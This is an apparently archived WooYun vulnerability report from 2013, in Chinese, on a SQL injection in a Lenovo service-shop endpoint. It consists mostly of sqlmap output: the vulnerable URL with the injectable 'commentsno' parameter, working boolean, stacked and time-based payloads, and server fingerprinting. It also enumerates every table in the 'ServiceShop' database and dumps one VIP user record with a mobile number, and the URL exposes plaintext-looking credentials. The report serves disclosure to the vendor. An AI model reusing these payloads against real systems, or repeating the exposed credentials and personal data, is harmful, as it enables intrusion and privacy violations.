乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-26: 细节已通知厂商并且等待厂商处理中 2013-08-26: 厂商已经确认,细节仅向厂商公开 2013-09-05: 细节向核心白帽子及相关领域专家公开 2013-09-15: 细节向普通白帽子公开 2013-09-25: 细节向实习白帽子公开 2013-10-10: 细节向公众公开
找都找不完的漏洞啊 又有一个分站有个注射点 这个点有点隐蔽
注射点:
http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815
这是赞同评论的地方 commentsno参数存在漏洞
---Place: GETParameter: commentsno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' AND 9492=9492 AND'uPDv'='uPDv&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=137748597815 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925'; WAITFOR DELAY '00:5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: commentsno=ab637223-3828-473c-a2be-058e346ec925' WAITFOR DELAY '0::5'--&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815---
web server operating system: Windows 2003web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008
当前库
current database: 'ServiceShop'
78个表
[11:08:06] [INFO] fetching number of tables for database 'ServiceShop'[11:08:06] [INFO] resumed: 78
速度比较慢,跑了前面一些表名
[11:08:09] [INFO] resuming partial value: dbo.ACT_Wen[11:08:12] [INFO] retrieved: dbo.ACT_WenDa[11:08:12] [INFO] retrieving the length of query output[11:08:12] [INFO] retrieved: 27[11:08:30] [INFO] retrieved: dbo.EP_ClassProductRelation[11:08:30] [INFO] retrieving the length of query output[11:08:30] [INFO] retrieved: 14[11:08:43] [INFO] retrieved: dbo.EP_CodeDef[11:08:43] [INFO] retrieving the length of query output[11:08:43] [INFO] retrieved: 19[11:08:56] [INFO] retrieved: dbo.EP_CodeDef_temp[11:08:56] [INFO] retrieving the length of query output[11:08:56] [INFO] retrieved: 19[11:09:11] [INFO] retrieved: dbo.EP_HomePageProd[11:09:11] [INFO] retrieving the length of query output[11:09:11] [INFO] retrieved: 15[11:09:23] [INFO] retrieved: dbo.EP_PassCode[11:09:23] [INFO] retrieving the length of query output[11:09:23] [INFO] retrieved: 20[11:09:39] [INFO] retrieved: dbo.EP_PassCode_temp[11:09:39] [INFO] retrieving the length of query output[11:09:39] [INFO] retrieved: 16[11:09:52] [INFO] retrieved: dbo.EP_Promotion[11:09:52] [INFO] retrieving the length of query output[11:09:52] [INFO] retrieved: 21[11:10:09] [INFO] retrieved: dbo.EP_Promotion_temp[11:10:09] [INFO] retrieving the length of query output[11:10:09] [INFO] retrieved: 23[11:10:25] [INFO] retrieved: dbo.EP_PromotionProduct[11:10:25] [INFO] retrieving the length of query output[11:10:25] [INFO] retrieved: 28[11:10:45] [INFO] retrieved: dbo.EP_PromotionProduct_temp 2[11:10:45] [INFO] retrieving the length of query output[11:10:45] [INFO] retrieved: 26[11:11:07] [INFO] retrieved: dbo.EP_ServiceProductPrice[11:11:07] [INFO] retrieving the length of query output[11:11:07] [INFO] retrieved: 31[11:11:28] [INFO] retrieved: dbo.EP_ServiceProductPrice_tem[11:11:28] [INFO] retrieving the length of query output[11:11:28] [INFO] retrieved: 24[11:11:44] [INFO] retrieved: dbo.EP_ServicePro_uctRel 23/24[11:12:03] [INFO] heuristics detected web page charset 'utf[11:12:03] [INFO] retrieved: dbo.EP_ServiceProcuctRel[11:12:03] [INFO] retrieving the length of query output[11:12:03] [INFO] retrieved: 25[11:12:23] [INFO] retrieved: dbo.EP_ServiceProductSale[11:12:23] [INFO] retrieving the length of query output[11:12:23] [INFO] retrieved: 38[11:12:55] [INFO] retrieved: dbo.EP_ServiceProductSale_bak_[11:12:55] [INFO] retrieving the length of query output[11:12:55] [INFO] retrieved: 30[11:13:13] [INFO] retrieved: dbo.EP_ServiceProductSale_temp[11:13:13] [INFO] retrieving the length of query output[11:13:13] [INFO] retrieved: 21[11:13:29] [INFO] retrieved: dbo.MD_ServiceProduct[11:13:29] [INFO] retrieving the length of query output[11:13:29] [INFO] retrieved: 30[11:14:03] [INFO] retrieved: dbo.MD_ServiceProdubt_20130124[11:14:03] [INFO] retrieving the length of query output[11:14:03] [INFO] retrieved: 26[11:14:26] [INFO] retrieved: dbo.MD_ServiceProduct_temp[11:14:26] [INFO] retrieving the length of query output[11:14:26] [INFO] retrieved: 16[11:14:42] [INFO] retrieved: dbo.SS_Agreement[11:14:42] [INFO] retrieving the length of query output[11:14:42] [INFO] retrieved: 18[11:14:59] [INFO] retrieved: dbo.SS_Attachments[11:14:59] [INFO] retrieving the length of query output[11:14:59] [INFO] retrieved: 15[11:15:13] [INFO] retrieved: dbo.SS_BigClass[11:15:13] [INFO] retrieving the length of query output[11:15:13] [INFO] retrieved: 23[11:15:32] [INFO] retrieved: dbo.SS_BigSmallClassRel[11:15:32] [INFO] retrieving the length of query output[11:15:32] [INFO] retrieved: 11[11:16:01] [INFO] retrieved: cbo.SS_Cart[11:16:01] [INFO] retrieving the length of query output[11:16:01] [INFO] retrieved: 15[11:16:15] [INFO] retrieved: dbo.SS_CartItem[11:16:15] [INFO] retrieving the length of query output[11:16:15] [INFO] retrieved: 16[11:16:28] [INFO] retrieved: dbo.SS_ClassInfo[11:16:28] [INFO] retrieving the length of query output[11:16:28] [INFO] retrieved: 19[11:16:43] [INFO] retrieved: dbo.SS_ClassProduct[11:16:43] [INFO] retrieving the length of query output[11:16:43] [INFO] retrieved: 24[11:17:03] [INFO] retrieved: dbo.SS_ClassPromotionExt[11:17:03] [INFO] retrieving the length of query output[11:17:03] [INFO] retrieved: 17[11:17:16] [INFO] retrieved: dbo.SS_Collection[11:17:16] [INFO] retrieving the length of query output[11:17:16] [INFO] retrieved: 15[11:17:29] [INFO] retrieved: dbo.SS_Delivery[11:17:29] [INFO] retrieving the length of query output[11:17:29] [INFO] retrieved: 22[11:17:47] [INFO] retrieved: dbo.SS_DictionaryValue[11:17:47] [INFO] retrieving the length of query output[11:17:47] [INFO] retrieved: 21[11:18:04] [INFO] retrieved: dbo.SS_DiscountRecord[11:18:04] [INFO] retrieving the length of query output[11:18:04] [INFO] retrieved: 15[11:18:17] [INFO] retrieved: dbo.SS_ErrorLog[11:18:17] [INFO] retrieving the length of query output[11:18:17] [INFO] retrieved: 17[11:18:31] [INFO] retrieved: dbo.SS_Evaluation[11:18:31] [INFO] retrieving the length of query output[11:18:31] [INFO] retrieved: 22[11:18:50] [INFO] retrieved: dbo.SS_EvaluationReply[11:18:50] [INFO] retrieving the length of query output[11:18:50] [INFO] retrieved: 14[11:19:02] [INFO] retrieved: dbo.SS_Explain[11:19:02] [INFO] retrieving the length of query output[11:19:02] [INFO] retrieved: 15[11:19:15] [INFO] retrieved: dbo.SS_FeedBack[11:19:15] [INFO] retrieving the length of query output[11:19:15] [INFO] retrieved: 16[11:19:28] [INFO] retrieved: dbo.SS_GroupInfo[11:19:28] [INFO] retrieving the length of query output[11:19:28] [INFO] retrieved: 19[11:19:43] [INFO] retrieved: dbo.SS_GroupProduct[11:19:43] [INFO] retrieving the length of query output[11:19:43] [INFO] retrieved: 20[11:19:59] [INFO] retrieved: dbo.SS_GroupPurchase[11:19:59] [INFO] retrieving the length of query output[11:19:59] [INFO] retrieved: 14[11:20:11] [INFO] retrieved: dbo.SS_Invoice[11:20:11] [INFO] retrieving the length of query output[11:20:11] [INFO] retrieved: 15[11:20:25] [INFO] retrieved: dbo.SS_LimitBuy[11:20:25] [INFO] retrieving the length of query output[11:20:25] [INFO] retrieved: 15[11:20:37] [INFO] retrieved: dbo.SS_LoginLog[11:20:37] [INFO] retrieving the length of query output[11:20:37] [INFO] retrieved: 17[11:20:51] [INFO] retrieved: dbo.SS_MyDiscount[11:20:51] [INFO] retrieving the length of query output[11:20:51] [INFO] retrieved: 11[11:21:02] [INFO] retrieved: dbo.SS_News[11:21:03] [INFO] retrieving the length of query output[11:21:03] [INFO] retrieved: 13[11:21:14] [INFO] retrieved: dbo.SS_PayLog[11:21:14] [INFO] retrieving the length of query output[11:21:14] [INFO] retrieved: 21[11:21:32] [INFO] retrieved: dbo.SS_PointsDiscount[11:21:32] [INFO] retrieving the length of query output[11:21:32] [INFO] retrieved: 19[11:21:47] [INFO] retrieved: dbo.SS_PointsRecord[11:21:47] [INFO] retrieving the length of query output[11:21:47] [INFO] retrieved: 17[11:22:01] [INFO] retrieved: dbo.SS_PointsRule[11:22:01] [INFO] retrieving the length of query output[11:22:01] [INFO] retrieved: 18[11:22:15] [INFO] retrieved: dbo.SS_PromExtItem[11:22:15] [INFO] retrieving the length of query output[11:22:15] [INFO] retrieved: 19[11:22:30] [INFO] retrieved: dbo.SS_PromotionExt[11:22:31] [INFO] retrieving the length of query output[11:22:31] [INFO] retrieved: 16[11:22:49] [INFO] retrieved: dbo.SS_SaleOrder[11:22:49] [INFO] retrieving the length of query output[11:22:49] [INFO] retrieved: 20[11:23:05] [INFO] retrieved: dbo.SS_SaleOrderLine[11:23:05] [INFO] retrieving the length of query output[11:23:05] [INFO] retrieved: 22[11:23:23] [INFO] retrieved: dbo.SS_SerchDictionary[11:23:23] [INFO] retrieving the length of query output[11:23:23] [INFO] retrieved: 19[11:23:40] [INFO] retrieved: dbo.SS_ServiceLucky[11:23:40] [INFO] retrieving the length of query output[11:23:40] [INFO] retrieved: 25[11:23:59] [INFO] retrieved: dbo.SS_ServicePrizeDetail[11:23:59] [INFO] retrieving the length of query output[11:23:59] [INFO] retrieved: 30[11:24:21] [INFO] retrieved: dbo.SS_ServiceProductAgreement[11:24:21] [INFO] retrieving the length of query output[11:24:21] [INFO] retrieved: 24[11:24:39] [INFO] retrieved: dbo.SS_ServiceProductExt[11:24:39] [INFO] retrieving the length of query output[11:24:39] [INFO] retrieved: 17[11:24:54] [INFO] retrieved: dbo.SS_SmallClass[11:24:54] [INFO] retrieving the length of query output[11:24:54] [INFO] retrieved: 24[11:25:13] [INFO] retrieved: dbo.SS_SmallClassProduct[11:25:13] [INFO] retrieving the length of query output[11:25:13] [INFO] retrieved: 17[11:25:27] [INFO] retrieved: dbo.SS_UserPoints[11:25:27] [INFO] retrieving the length of query output[11:25:27] [INFO] retrieved: 12[11:25:38] [INFO] retrieved: dbo.SS_Value[11:25:39] [INFO] retrieving the length of query output[11:25:39] [INFO] retrieved: 15[11:25:50] [INFO] retrieved: dbo.SS_VIP_User[11:25:51] [INFO] retrieving the length of query output[11:25:51] [INFO] retrieved: 15[11:26:02] [INFO] retrieved: dbo.SS_VisitLog[11:26:02] [INFO] retrieving the length of query output[11:26:02] [INFO] retrieved: 29[11:26:20] [INFO] retrieved: dbo.SS_VM_GroupPurchase_Order[11:26:20] [INFO] retrieving the length of query output[11:26:20] [INFO] retrieved: 27[11:26:38] [INFO] retrieved: dbo.SS_VM_LimitBuy_cs_Order[11:26:38] [INFO] retrieving the length of query output[11:26:38] [INFO] retrieved: 30[11:26:59] [INFO] retrieved: dbo.SS_VW_BianJiBuChongProduct[11:26:59] [INFO] retrieving the length of query output[11:26:59] [INFO] retrieved: 20[11:27:14] [INFO] retrieved: dbo.SS_VW_Evaluation[11:27:14] [INFO] retrieving the length of query output[11:27:15] [INFO] retrieved: 22[11:27:31] [INFO] retrieved: dbo.SS_VW_GroupProduct
跑VIP用户表的第一条数据
+----+------+---------------------+--------+-------------+---------+---------+---------+----------+----------+----------+-----------+-------------+-------------+--------------+| id | name | email | status | mobile | count | station | cleaned | order_no | username | buy_time | update_ip | remote_code | update_time| cleaned_time |+----+------+---------------------+--------+-------------+---------+---------+---------+----------+----------+----------+-----------+-------------+-------------+--------------+| 1 | ?? | [email protected] | ?? | 13520328797 |+----+------+---------------------+--------+-------------+---------+---------+---------+----------+----------+----------+-----------+-------------+-------------+--------------+
过滤哦
危害等级:高
漏洞Rank:15
确认时间:2013-08-26 14:39
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无